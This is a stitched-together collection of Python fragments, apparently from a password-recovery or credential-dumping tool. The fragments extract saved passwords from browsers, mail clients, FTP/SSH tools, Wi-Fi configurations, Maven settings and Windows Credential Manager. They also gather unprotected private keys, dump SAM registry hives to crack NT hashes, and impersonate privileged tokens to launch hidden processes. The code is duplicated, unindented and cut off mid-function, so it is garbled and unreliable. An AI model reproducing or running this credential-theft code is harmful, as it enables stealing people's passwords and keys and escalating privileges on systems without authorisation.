def hashes_to_dic(self, title, format, content):
Header().title1(title)
print_debug('INFO', 'Format: (%s)' % format)
items = sorted(content)
pwdFound = []
values = {}
all_hash = '\r\n'
for item in items:
hash = content[item]
(uid, rid, lmhash, nthash) = hash.split(':')[:4]
self.wordlist.append(uid.encode("utf8"))
all_hash = '%s\r\n%s' % (all_hash, hash)
password = self.bruteForce_Hash(nthash)
# if a password has been found from the dictionary attack
if password:
accounts = {}
accounts['Category'] = 'System account'
accounts['user'] = uid
accounts['password'] = password
pwdFound.append(accounts)
values['hashes'] = all_hash
pwdFound.append(values)
return pwdFound
def run(self):
# print title
Header().title_info('Dot Net Passport')
a = self.get_creds()
pwd = ''
pwdFound = []
if a:
for i in a:
values = {}
if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
cipher_text = i['CredentialBlob']
pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy())
if pwd != 'failed':
values['TargetName'] = i['TargetName']
if i['UserName'] is not None:
values['Username'] = i['UserName']
try:
values['Password'] = pwd.decode('utf16')
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
values['INFO'] = 'Error decoding the password'
pwdFound.append(values)
# print the results
print_output('Dot Net Passport', pwdFound)
def get_creds(self):
try:
creds = win32cred.CredEnumerate(None, 0)
return creds
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return None
def impersonate_token(hToken):
if not windll.Shell32.IsUserAnAdmin():
print_debug('ERROR', 'You need admin rights to run impersonate !')
EnablePrivilege("SeDebugPrivilege")
#hToken = getProcessToken(pid)
hTokendupe = HANDLE( INVALID_HANDLE_VALUE )
SecurityImpersonation = 2
TokenPrimary = 1
if not windll.advapi32.DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, None, SecurityImpersonation, TokenPrimary, byref( hTokendupe ) ):
WinError()
windll.kernel32.CloseHandle(hToken)
try:
EnablePrivilege("SeAssignPrimaryTokenPrivilege", hToken = hTokendupe)
except Exception as e:
pass
try:
EnablePrivilege("SeIncreaseQuotaPrivilege", hToken = hTokendupe)
except Exception as e:
pass
try:
EnablePrivilege("SeImpersonatePrivilege")
except Exception as e:
pass
if not windll.advapi32.ImpersonateLoggedOnUser(hTokendupe):
return
return hTokendupe
def start_proc_with_token(args, hTokendupe, hidden=True):
##Start the process with the token.
lpProcessInformation = PROCESS_INFORMATION()
lpStartupInfo = STARTUPINFO()
if hidden:
lpStartupInfo.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
lpStartupInfo.wShowWindow = subprocess.SW_HIDE
CREATE_NEW_CONSOLE = 0x00000010
CREATE_UNICODE_ENVIRONMENT = 0x00000400
NORMAL_PRIORITY_CLASS = 0x00000020
dwCreationflag = NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE
userenv = WinDLL('userenv', use_last_error=True)
userenv.CreateEnvironmentBlock.argtypes = (POINTER(c_void_p), c_void_p, c_int)
userenv.DestroyEnvironmentBlock.argtypes = (c_void_p,)
cenv = c_void_p()
success = userenv.CreateEnvironmentBlock(byref(cenv), hTokendupe, 0)
if not success:
return
success = windll.advapi32.CreateProcessAsUserA(hTokendupe, None, ' '.join(args), None, None, True, dwCreationflag, cenv, None, byref(lpStartupInfo), byref(lpProcessInformation))
if not success:
return
print_debug('INFO', 'Process created PID: ' + str(lpProcessInformation.dwProcessId))
return lpProcessInformation.dwProcessId
def run(self):
# Need admin privileges
if not windll.Shell32.IsUserAnAdmin():
if logging.getLogger().isEnabledFor(logging.INFO) == True:
Header().title('Windows Secrets')
print_debug('WARNING', '[!] This script should be run as admin!')
return
# print the title
Header().title('Windows Secrets')
# if hives already exists
if self.check_existing_systemFiles():
self.delete_existing_systemFiles() # delete it
# save system hives
for f in self.sysFile:
subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()
if not self.check_existing_systemFiles():
print_debug('WARNING', 'Remove existing hive files and launch it again.')
return
retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history)
# remove hives files
self.delete_existing_systemFiles()
def ListSids():
sids=[]
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'username', 'name'])
except psutil.NoSuchProcess:
pass
if pinfo['pid']<=4:
continue
if pinfo['username'] is None:
continue
try:
hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pinfo['pid']))
hToken = HANDLE(INVALID_HANDLE_VALUE)
windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken))
try:
sids.append((pinfo['pid'], pinfo['name'], GetTokenSid(hToken), pinfo['username']))
except:
pass
windll.kernel32.CloseHandle(hToken)
windll.kernel32.CloseHandle(hProcess)
except Exception as e:
print_debug('ERROR', str(e))
return list(sids)
def get_history(self):
urls = []
urls = self.history_from_regedit()
try:
# wrapper to call the dll exported function (called list)
lib = cdll.LoadLibrary(dll_name)
lib.list.restype = POINTER(c_wchar_p)
ret = lib.list()
for r in ret:
if r:
if r.startswith("http") and r not in urls:
urls.append(r)
else:
break
# Unload the dll to delete it later
handle = lib._handle # obtain the DLL handle
windll.kernel32.FreeLibrary(handle)
# delete the dll
os.remove(dll_name)
except:
print_debug('ERROR', 'Browser history failed to load, only few url will be tried')
pass
urls.append('https://www.facebook.com/')
urls.append('https://www.gmail.com/')
urls.append('https://accounts.google.com/')
urls.append('https://accounts.google.com/servicelogin')
return urls
def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
""" Reads passwords from ClawsMail's accountrc file """
p = ConfigParser()
p.read(filename)
pwdFound = []
for s in p.sections():
values = {}
try:
try:
address = p.get(s, 'address')
account = p.get(s, 'account_name')
except:
address = '<unknown>'
account = '<unknown>'
password = self.pass_decrypt(p.get(s, 'password'), key, mode=mode)
# print('password for %s, %s is "%s"' % (account, address, password))
values = {'Account' : account, 'Address': address, 'Password': password}
except Exception as e:
print_debug('ERROR', 'Error resolving password for account "%s": %s' % (s, e))
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
return pwdFound
def extractSecretKey(self, globalSalt, masterPassword, entrySalt):
(globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword)
if unhexlify('f8000000000000000000000000000001') not in self.key3:
return None
privKeyEntry = self.key3[ unhexlify('f8000000000000000000000000000001') ]
saltLen = ord( privKeyEntry[1] )
nameLen = ord( privKeyEntry[2] )
privKeyEntryASN1 = decoder.decode( privKeyEntry[3+saltLen+nameLen:] )
data = privKeyEntry[3+saltLen+nameLen:]
self.printASN1(data, len(data), 0)
#see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
privKeyData = privKeyEntryASN1[0][1].asOctets()
privKey = self.decrypt3DES( globalSalt, masterPassword, entrySalt, privKeyData )
self.printASN1(privKey, len(privKey), 0)
privKeyASN1 = decoder.decode( privKey )
prKey= privKeyASN1[0][2].asOctets()
self.printASN1(prKey, len(prKey), 0)
prKeyASN1 = decoder.decode( prKey )
id = prKeyASN1[0][1]
key = long_to_bytes( prKeyASN1[0][3] )
print_debug('DEBUG', 'key: %s' % repr(key))
return key
def hashes_to_dic(self, title, format, content):
Header().title1(title)
print_debug('INFO', 'Format: (%s)' % format)
items = sorted(content)
pwdFound = []
values = {}
all_hash = '\r\n'
for item in items:
hash = content[item]
(uid, rid, lmhash, nthash) = hash.split(':')[:4]
self.wordlist.append(uid.encode("utf8"))
all_hash = '%s\r\n%s' % (all_hash, hash)
password = self.bruteForce_Hash(nthash)
# if a password has been found from the dictionary attack
if password:
accounts = {}
accounts['Category'] = 'System account'
accounts['user'] = uid
accounts['password'] = password
pwdFound.append(accounts)
values['hashes'] = all_hash
pwdFound.append(values)
return pwdFound
def run(self):
# print title
Header().title_debug('SQL Developer')
mainPath = self.get_mainPath()
if mainPath == 'Error':
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
elif mainPath == 'SQL_NOT_EXISTS':
print_debug('INFO','SQL Developer not installed.')
elif mainPath == 'SQL_NO_PASSWD':
print_debug('INFO', 'No passwords found.')
else:
passphrase = self.get_passphrase(mainPath)
if passphrase == 'Not_Found':
print_debug('WARNING', 'The passphrase used to encrypt has not been found.')
elif passphrase == 'xml_Not_Found':
print_debug('WARNING', 'The xml file containing the passphrase has not been found.')
else:
salt = self.get_salt()
self.get_infos(mainPath, passphrase, salt)
def decipher_new_version(self, path):
database_path = path + os.sep + 'Login Data'
if os.path.exists(database_path):
# Connect to the Database
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
return
pwdFound = []
for result in cursor.fetchall():
values = {}
# Decrypt the Password
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
# print the results
print_output("Opera", pwdFound)
def retrieve_password(self):
# print the title
Header().title_debug('Wifi (from Network Manager)')
directory = '/etc/NetworkManager/system-connections'
if os.path.exists(directory):
if os.getuid() != 0:
print_debug('INFO', 'You need more privileges (run it with sudo)\n')
wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
pwdFound = []
for w in wireless_ssid:
cp = RawConfigParser()
cp.read(os.path.join(directory, w))
values = {}
values['SSID'] = w
if cp.sections():
for section in cp.sections():
if 'wireless' in section:
for i in cp.items(section):
values[i[0]] = i[1]
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
print_output('Wifi', pwdFound)
else:
print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
""" Reads passwords from ClawsMail's accountrc file """
p = ConfigParser()
p.read(filename)
pwdFound = []
for s in p.sections():
values = {}
try:
try:
address = p.get(s, 'address')
account = p.get(s, 'account_name')
except:
address = '<unknown>'
account = '<unknown>'
password = self.pass_decrypt(p.get(s, 'password'), key, mode=mode)
# print('password for %s, %s is "%s"' % (account, address, password))
values = {'Account' : account, 'Address': address, 'Password': password}
except Exception as e:
print_debug('ERROR', 'Error resolving password for account "%s": %s' % (s, e))
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
return pwdFound
def run(self):
# print title
Header().title_debug('SQL Developer')
mainPath = self.get_mainPath()
if mainPath == 'Error':
print_debug('ERROR',
'The APPDATA environment variable is not defined.')
elif mainPath == 'SQL_NOT_EXISTS':
print_debug('INFO', 'SQL Developer not installed.')
elif mainPath == 'SQL_NO_PASSWD':
print_debug('INFO', 'No passwords found.')
else:
passphrase = self.get_passphrase(mainPath)
if passphrase == 'Not_Found':
print_debug(
'WARNING',
'The passphrase used to encrypt has not been found.')
elif passphrase == 'xml_Not_Found':
print_debug(
'WARNING',
'The xml file containing the passphrase has not been found.'
)
else:
salt = self.get_salt()
self.get_infos(mainPath, passphrase, salt)
def get_history(self):
urls = []
urls = self.history_from_regedit()
try:
# wrapper to call the dll exported function (called list)
lib = cdll.LoadLibrary(dll_name)
lib.list.restype = POINTER(c_wchar_p)
ret = lib.list()
for r in ret:
try:
if r:
if r.startswith("http") and r not in urls:
urls.append(r)
else:
break
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
# Unload the dll to delete it later
handle = lib._handle # obtain the DLL handle
windll.kernel32.FreeLibrary(handle)
# delete the dll
os.remove(dll_name)
def extractSecretKey(self, globalSalt, masterPassword, entrySalt):
(globalSalt, masterPassword,
entrySalt) = self.is_masterpassword_correct(masterPassword)
if unhexlify('f8000000000000000000000000000001') not in self.key3:
return None
privKeyEntry = self.key3[unhexlify('f8000000000000000000000000000001')]
saltLen = ord(privKeyEntry[1])
nameLen = ord(privKeyEntry[2])
privKeyEntryASN1 = decoder.decode(privKeyEntry[3 + saltLen + nameLen:])
data = privKeyEntry[3 + saltLen + nameLen:]
self.printASN1(data, len(data), 0)
#see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
privKeyData = privKeyEntryASN1[0][1].asOctets()
privKey = self.decrypt3DES(globalSalt, masterPassword, entrySalt,
privKeyData)
self.printASN1(privKey, len(privKey), 0)
privKeyASN1 = decoder.decode(privKey)
prKey = privKeyASN1[0][2].asOctets()
self.printASN1(prKey, len(prKey), 0)
prKeyASN1 = decoder.decode(prKey)
id = prKeyASN1[0][1]
key = long_to_bytes(prKeyASN1[0][3])
print_debug('DEBUG', 'key: %s' % repr(key))
return key
def get_key_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return False
def get_logins_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return False
def get_history(self):
urls = []
urls = self.history_from_regedit()
try:
# wrapper to call the dll exported function (called list)
lib = cdll.LoadLibrary(dll_name)
lib.list.restype = POINTER(c_wchar_p)
ret = lib.list()
for r in ret:
try:
if r:
if r.startswith("http") and r not in urls:
urls.append(r)
else:
break
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# Unload the dll to delete it later
handle = lib._handle # obtain the DLL handle
windll.kernel32.FreeLibrary(handle)
# delete the dll
os.remove(dll_name)
def retrieve_password(self):
# print the title
Header().title_debug('Wifi (from Network Manager)')
directory = '/etc/NetworkManager/system-connections'
if os.path.exists(directory):
if os.getuid() != 0:
print_debug('INFO', 'You need more privileges (run it with sudo)\n')
wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
pwdFound = []
for w in wireless_ssid:
cp = RawConfigParser()
cp.read(os.path.join(directory, w))
values = {}
values['SSID'] = w
if cp.sections():
for section in cp.sections():
if 'wireless' in section:
for i in cp.items(section):
values[i[0]] = i[1]
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
print_output('Wifi', pwdFound)
else:
print_debug('WARNING', 'the path "%s" does not exist' %(directory))
def get_key_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return False
def run(self):
# print title
Header().title_info('Kalypso Media Launcher')
creds = []
key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
if 'APPDATA' in os.environ:
inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
return
# The actual user details are stored in *.userdata files
if not os.path.exists(inifile):
print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
return
config = ConfigParser.ConfigParser()
config.read(inifile)
values = {}
values['Login'] = config.get('styx user','login')
# get the encoded password
cookedpw = base64.b64decode(config.get('styx user','password'));
values['Password'] = self.xorstring(cookedpw, key)
creds.append(values)
print_output("Kalypso Media Launcher", creds)
class Chrome(ModuleInfo):
def __init__(self):
options = {
'command': '-c',
'action': 'store_true',
'dest': 'chrome',
'help': 'chrome'
}
ModuleInfo.__init__(self, 'chrome', 'browsers', options)
# main function
def run(self):
# print title
Header().title_info('Chrome')
database_path = ''
if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
# For Win7
path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH'
) + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'
# For XP
path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH'
) + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
if os.path.exists(path_XP):
database_path = path_XP
elif os.path.exists(path_Win7):
database_path = path_Win7
else:
print_debug('INFO', 'Google Chrome not installed.')
return
else:
print_debug(
'ERROR',
'Environment variables (HOMEDRIVE or HOMEPATH) have not been found'
)
return
# Copy database before to query it (bypass lock errors)
try:
shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
database_path = os.getcwd() + os.sep + 'tmp_db'
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'An error occured copying the database file')
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'An error occured opening the database file')
return
def retrieve_password(self):
# print title
Header().title_debug('Outlook')
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except:
print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
return
num = win32api.RegQueryInfoKey(hkey)[0]
pwdFound = []
for x in range(0, num):
name = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
num_skey = win32api.RegQueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = win32api.RegEnumKey(skey, y)
sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
num_sskey = win32api.RegQueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = win32api.RegEnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
print_output("Outlook", pwdFound)
def run(self):
# print title
Header().title_info('Kalypso Media Launcher')
creds = []
key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
if 'APPDATA' in os.environ:
inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
return
# The actual user details are stored in *.userdata files
if not os.path.exists(inifile):
print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
return
config = ConfigParser.ConfigParser()
config.read(inifile)
values = {}
values['Login'] = config.get('styx user','login')
# get the encoded password
cookedpw = base64.b64decode(config.get('styx user','password'));
values['Password'] = self.xorstring(cookedpw, key)
creds.append(values)
print_output("Kalypso Media Launcher", creds)
def get_creds(self):
try:
creds = win32cred.CredEnumerate(None, 0)
return creds
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return None
def extract_repositories_credentials(self):
"""
Extract all repositories's credentials.
See https://maven.apache.org/settings.html#Servers
:return: List of dict in which one dict contains all information for a repository.
"""
repos_creds = []
maven_settings_file_location = os.environ.get("USERPROFILE") + "\\.m2\\settings.xml"
if os.path.isfile(maven_settings_file_location):
try:
settings = ET.parse(maven_settings_file_location).getroot()
server_nodes = settings.findall(".//%sserver" % self.settings_namespace)
for server_node in server_nodes:
creds = {}
for child_node in server_node:
tag_name = child_node.tag.replace(self.settings_namespace, "")
if tag_name in self.nodes_to_extract:
creds[tag_name] = child_node.text.strip()
if len(creds) > 0:
repos_creds.append(creds)
except Exception as e:
print_debug("ERROR", "Cannot retrieve repositories credentials '%s'" % e)
pass
return repos_creds
def extract_private_keys_unprotected(self):
"""
Extract all DSA/RSA private keys that are not protected with a passphrase.
:return: List of encoded key (key file content)
"""
keys = []
if isdir(self.key_files_location):
for (dirpath, dirnames, filenames) in walk(self.key_files_location, followlinks=True):
for f in filenames:
key_file_path = join(dirpath, f)
if isfile(key_file_path):
try:
# Read encoded content of the key
with open(key_file_path, "r") as key_file:
key_content_encoded = key_file.read()
# Determine the type of the key (public/private) and what is it algorithm
if "DSA PRIVATE KEY" in key_content_encoded:
key_algorithm = "DSA"
elif "RSA PRIVATE KEY" in key_content_encoded:
key_algorithm = "RSA"
else:
key_algorithm = None
# Check if the key can be loaded (used) without passphrase
if key_algorithm is not None and self.is_private_key_unprotected(key_content_encoded,
key_algorithm):
keys.append(key_content_encoded)
except Exception as e:
print_debug("ERROR", "Cannot load key file '%s' '%s'" % (key_file_path, e))
pass
return keys
def is_private_key_unprotected(self, key_content_encoded, key_algorithm):
"""
Check if the private key can be loaded without specifying any passphrase.
PyCrypto >= 2.6.1 required in order to have the method importKey() in DSA class.
:param key_content_encoded: Encoded content of the private key to test
:param key_algorithm: Algorithm of the key (RSA or DSA)
:return: True only if the key can be successfuly loaded and is usable
"""
state = False
try:
# Try to load it
if key_algorithm == "RSA":
key = RSA.importKey(key_content_encoded)
else:
key = DSA.importKey(key_content_encoded)
# Validate loading
state = (key is not None and key.can_sign() and key.has_private())
except Exception as e:
print_debug("ERROR", "Cannot validate key protection '%s'" % e)
state = False
pass
return state
def run(self, historic=''):
# print title
Header().title_debug('Internet Explorer')
# write the binary file
try:
self.write_binary_file()
except:
print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
list = []
if historic:
if os.path.exists(historic):
f = open(historic, 'r')
for line in f:
list.append(line.strip())
else:
print_debug('WARNING', 'The text file %s does not exist' % historic)
# retrieve the urls from the history
hash_tables = self.get_hash_table(list)
# open the registry
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
failed = False
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except:
failed = True
nb_site = 0
nb_pass_found = 0
if failed == False:
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if k:
nb_site +=1
for h in hash_tables:
# both hash are similar, we can decipher the password
if h[1] == k[0][:40].lower():
nb_pass_found += 1
cipher_text = k[1]
self.decipher_password(cipher_text, h[0])
break
# print the results
print_output("Internet Explorer", pwdFound)
# manage errors
if nb_site == 0:
print_debug('INFO', 'No credentials stored in the IE browser.')
elif nb_site > nb_pass_found:
print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found))
else:
print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
def check_winscp_installed(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
return True
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return False
def initialize_libnss(self, list_libnss, profile):
for lib in list_libnss:
try:
self.libnss = CDLL(lib)
if self.libnss.NSS_Init(profile) == 0:
return True
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
def initialize_libnss(self, list_libnss, profile):
for lib in list_libnss:
try:
self.libnss = CDLL(lib)
if self.libnss.NSS_Init(profile) == 0:
return True
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
def get_infos(self, path, passphrase, salt):
for p in os.listdir(path):
if p.startswith('o.jdeveloper.db.connection'):
path += os.sep + p
break
xml_file = path + os.sep + 'connections.xml'
if os.path.exists(xml_file):
tree = ET.ElementTree(file=xml_file)
pwdFound = []
values = {}
for elem in tree.iter():
if 'addrType' in elem.attrib.keys():
if elem.attrib['addrType'] == 'sid':
for e in elem.getchildren():
values['sid'] = e.text
elif elem.attrib['addrType'] == 'port':
for e in elem.getchildren():
values['port'] = e.text
elif elem.attrib['addrType'] == 'user':
for e in elem.getchildren():
values['user'] = e.text
elif elem.attrib['addrType'] == 'ConnName':
for e in elem.getchildren():
values['Connection Name'] = e.text
elif elem.attrib['addrType'] == 'customUrl':
for e in elem.getchildren():
values['custom Url'] = e.text
elif elem.attrib['addrType'] == 'SavePassword':
for e in elem.getchildren():
values['SavePassword'] = e.text
elif elem.attrib['addrType'] == 'hostname':
for e in elem.getchildren():
values['hostname'] = e.text
elif elem.attrib['addrType'] == 'password':
for e in elem.getchildren():
pwd = self.decrypt(salt, e.text, passphrase)
values['password'] = pwd
elif elem.attrib['addrType'] == 'driver':
for e in elem.getchildren():
values['driver'] = e.text
# password found
pwdFound.append(values)
# print the results
print_output("SQL Developer", pwdFound)
else:
print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
def get_infos(self, path, passphrase, salt):
for p in os.listdir(path):
if p.startswith('o.jdeveloper.db.connection'):
path += os.sep + p
break
xml_file = path + os.sep + 'connections.xml'
if os.path.exists(xml_file):
tree = ET.ElementTree(file=xml_file)
pwdFound = []
values = {}
for elem in tree.iter():
if 'addrType' in elem.attrib.keys():
if elem.attrib['addrType'] == 'sid':
for e in elem.getchildren():
values['sid'] = e.text
elif elem.attrib['addrType'] == 'port':
for e in elem.getchildren():
values['port'] = e.text
elif elem.attrib['addrType'] == 'user':
for e in elem.getchildren():
values['user'] = e.text
elif elem.attrib['addrType'] == 'ConnName':
for e in elem.getchildren():
values['Connection Name'] = e.text
elif elem.attrib['addrType'] == 'customUrl':
for e in elem.getchildren():
values['custom Url'] = e.text
elif elem.attrib['addrType'] == 'SavePassword':
for e in elem.getchildren():
values['SavePassword'] = e.text
elif elem.attrib['addrType'] == 'hostname':
for e in elem.getchildren():
values['hostname'] = e.text
elif elem.attrib['addrType'] == 'password':
for e in elem.getchildren():
pwd = self.decrypt(salt, e.text, passphrase)
values['password'] = pwd
elif elem.attrib['addrType'] == 'driver':
for e in elem.getchildren():
values['driver'] = e.text
# password found
pwdFound.append(values)
# print the results
print_output("SQL Developer", pwdFound)
else:
print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
def parse_file(self):
pwdFound = []
fd = None
try:
fd = open(self.filestr)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
def retrieve_password(self):
# print title
Header().title_debug('FTP Navigator')
path = "C:\\FTP Navigator\\Ftplist.txt"
if os.path.exists(path):
self.read_file(path)
else:
print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
def parse_file(self):
pwdFound = []
fd = None
try:
fd = open(self.filestr)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
def get_logins_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(
win32con.HKEY_CURRENT_USER,
'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
return False
def retrieve_password(self):
# print the title
Header().title_debug('Jitsi')
file_properties = self.get_path()
if file_properties == 'JITSI_NOT_EXISTS':
print_debug('INFO', 'Jitsi not installed.')
else:
self.get_info(file_properties)
def run(self):
# print the title
Header().title_info('Jitsi')
file_properties = self.get_path()
if file_properties == 'JITSI_NOT_EXISTS':
print_debug('INFO', 'Jitsi not installed.')
else:
self.get_info(file_properties)
def run(self, historic=''):
# print title
Header().title_info('Internet Explorer')
# write the binary file
try:
self.write_binary_file()
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
def run(self):
# print title
Header().title_info('Puttycm')
try:
database_path = self.get_default_database()
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('INFO', 'Puttycm not installed')
return
def rev2self():
global global_ref
windll.advapi32.RevertToSelf()
try:
if global_ref is not None:
windll.kernel32.CloseHandle(global_ref)
except:
pass
global_ref=None
print_debug('INFO', 'Running as: ' + GetUserName())
def check_winscp_installed(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(
win32con.HKEY_CURRENT_USER,
'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0,
accessRead)
return True
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
return False
def run(self, historic=''):
# print title
Header().title_info('Internet Explorer')
# write the binary file
try:
self.write_binary_file()
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug(
'ERROR',
'%s cannot be created, check your file permission' % dll_name)
def readBsddb(self, name):
f = open(name, 'rb')
#http://download.oracle.com/berkeley-db/db.1.85.tar.gz
header = f.read(4 * 15)
magic = self.getLongBE(header, 0)
if magic != 0x61561:
print_debug('WARNING', 'Bad magic number')
return False
version = self.getLongBE(header, 4)
if version != 2:
print_debug('WARNING', 'Bad version !=2 (1.85)')
return False
pagesize = self.getLongBE(header, 12)
nkeys = self.getLongBE(header, 0x38)
readkeys = 0
page = 1
nval = 0
val = 1
db1 = []
while (readkeys < nkeys):
f.seek(pagesize * page)
offsets = f.read((nkeys + 1) * 4 + 2)
offsetVals = []
i = 0
nval = 0
val = 1
keys = 0
while nval != val:
keys += 1
key = self.getShortLE(offsets, 2 + i)
val = self.getShortLE(offsets, 4 + i)
nval = self.getShortLE(offsets, 8 + i)
